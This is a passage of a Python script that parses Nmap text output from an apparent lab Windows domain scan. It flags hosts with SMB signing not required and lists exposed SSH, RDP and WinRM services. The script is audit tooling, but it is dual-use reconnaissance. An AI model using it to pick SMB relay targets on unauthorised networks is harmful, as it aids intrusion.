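HOST_RE = re.compile(r"Nmap scan report for (?:(?P<name>\S+) \()?(?P<ip>\d+(?:\.\d+){3})\)?")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)")
NAME_RE = re.compile(r"DNS_Computer_Name: (\S+)")
SIGN_RE = re.compile(r"Message signing enabled (and|but not) required")

# Remote-administration ports worth listing per host (choice made for this example).
MGMT_PORTS = {22: "ssh", 3389: "rdp", 5985: "winrm"}

# Constructed sample: three host blocks abbreviated from the scan on this page,
# kept in the same flattened form (no indentation, stray ** bold markers).
SAMPLE = """\
**Nmap scan report for 172.16.243.180**
88/tcp open kerberos-sec Microsoft Windows Kerberos
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| DNS_Computer_Name: dc01.final.com
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
**Nmap scan report for 172.16.243.187**
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
3389/tcp open ms-wbt-server Microsoft Terminal Services
**| DNS_Domain_Name: final.com
| DNS_Computer_Name: sql03.final.com
| DNS_Tree_Name: final.com**
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
**Nmap scan report for 172.16.243.197**
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
"""


def parse_scan(text):
    """Return {ip: {"name", "ports", "smb_signing_required"}} from Nmap text output."""
    hosts, cur = {}, None
    for raw in text.splitlines():
        line = raw.strip().strip("*").strip()  # drop markdown bold residue
        if (m := HOST_RE.search(line)):
            cur = hosts.setdefault(
                m["ip"], {"name": m["name"], "ports": {}, "smb_signing_required": None})
            continue
        if cur is None:
            continue
        if (m := PORT_RE.match(line)):
            cur["ports"][int(m[1])] = m[2]
        elif (m := NAME_RE.search(line)):
            cur["name"] = m[1]
        elif (m := SIGN_RE.search(line)):
            cur["smb_signing_required"] = m[1] == "and"
    return hosts


def signing_gaps(hosts):
    """Hosts with SMB (445/tcp) open whose SMB2 signing is not required."""
    return sorted((ip, h["name"]) for ip, h in hosts.items()
                  if 445 in h["ports"] and h["smb_signing_required"] is False)


def mgmt_exposure(hosts):
    """Map each host to the remote-administration services it exposes."""
    return {ip: sorted(MGMT_PORTS[p] for p in h["ports"] if p in MGMT_PORTS)
            for ip, h in hosts.items()}


if __name__ == "__main__":
    scan = parse_scan(SAMPLE)
    print("SMB signing not required:", signing_gaps(scan))
    print("Management services:", mgmt_exposure(scan))
```

For recurring audits, Nmap's XML output (`-oX`) is a more stable input than the text form parsed here.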